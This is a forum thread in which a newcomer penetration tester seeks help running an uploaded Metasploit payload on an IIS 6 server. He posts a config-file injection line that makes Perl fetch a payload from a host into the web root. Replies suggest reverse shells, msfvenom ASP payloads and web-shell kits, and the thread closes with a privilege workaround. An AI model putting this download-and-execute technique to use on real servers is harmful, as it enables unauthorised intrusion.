.

Executing metasploit payload uploaded by IIS guest

<<

Bluecifer

Newbie
Newbie

Posts: 3

Joined: Wed Dec 05, 2012 12:03 am

Post Wed Dec 05, 2012 12:19 am

Executing metasploit payload uploaded by IIS guest

Hello all,

Fairly new pentester here, having issues executing a metasploit payload uploaded by the IIS guest account. All payloads seem to fail, or do not have adequate permissions to execute.

Background on target:
IIS 6 running on Win2kSP2 with ASP. The IIS guest account has read/write/execute. I can upload a file through a vulnerability I discovered, however I cannot execute. If for example I upload and ASP shell, I receive an error saying access denied on line etc (which is at the end of the payload). I have verified ASP scripts can run by uploading something simple like document.write("hello"). Maybe I can use a different payload?

Any ideas here or suggested reading you can point me to?
Last edited by Bluecifer on Wed Dec 05, 2012 12:24 am, edited 1 time in total.
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Dec 05, 2012 12:52 am

Re: Executing metasploit payload uploaded by IIS guest

Are you uploading the exploit via webdav? Maybe some characters are getting removed or modified in transit. Are you performing any sort of encoding?

And yes, maybe try another payload, such as a bind or reverse shell. I assume you're trying Meterpreter?
The day you stop learning is the day you start becoming obsolete.
<<

Bluecifer

Newbie
Newbie

Posts: 3

Joined: Wed Dec 05, 2012 12:03 am

Post Wed Dec 05, 2012 1:14 am

Re: Executing metasploit payload uploaded by IIS guest

Thank you for the reply. I am able to upload via writing a small perl script. The application fails to validate the location of the configuration file, and an attacker can specify an extra "\" and the server will read the config file via smb or webdav. The configuration file specifies the location of the logfile. For example:

  Code:
LogFile= perl -e "use LWP::Simple; getstore('http://192.168.2.4/payload', 'C:\inetpub\wwwroot\payload');" |


Once uploaded though I cannot take advantage of exec() or system() with perl, (you can run logfile script multiple times) as the IIS account appears to not have the proper permissions to execute cmd.exe. When I tested in a lab environment, and changed permissions of cmd.exe to 'everyone', I was able to get a shell. This also appears to be the same problem with the metasploit payloads as well (cmd.exe).

I guess what I am asking is what do you do when pentesting an app running on IIS since it uses the guest account? Maybe I need some other creativity (look for other files containing passwords, etc). Any ideas? Just looking for other opinions or ideas.

Thanks!
Last edited by Bluecifer on Wed Dec 05, 2012 1:18 am, edited 1 time in total.
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Dec 05, 2012 2:22 am

Re: Executing metasploit payload uploaded by IIS guest

I'm really not familiar with running Perl on IIS. I'd setup a test system locally in a VM and see what you can work out there. That's usually a better plan than trial-and-error on a remote system. That'll allow you to see the log files, event logs, etc. and determine where the problem lies.

However, the restricted guest account should be able to run commands, especially as far back as Win2k. There may be Perl configuration settings that prevent this, but that account can certainly get a shell; I've done so numerous times via ASP. You're not going to be able to perform privileged operations (i.e. adding users), but that's not going to prevent you from running general commands.

Here's an ASP example: http://carnal0wnage.attackresearch.com/ ... ebdav.html Some parts are different than the technique you're using, but maybe try creating an ASP file via msfpayload/msfencode/msfvenom or use something out of: http://laudanum.inguardians.com/
The day you stop learning is the day you start becoming obsolete.
<<

Bluecifer

Newbie
Newbie

Posts: 3

Joined: Wed Dec 05, 2012 12:03 am

Post Wed Dec 05, 2012 2:55 pm

Re: Executing metasploit payload uploaded by IIS guest

Thanks again for the reply. I hit the 'Googles' and was able to find an interesting article giving an example of uploading your own "cmd.exe" to overcome the issue I was having.  Rewrote the ASP script to point to my cmd.exe and was able to get "network service" level privileges.

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 2 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software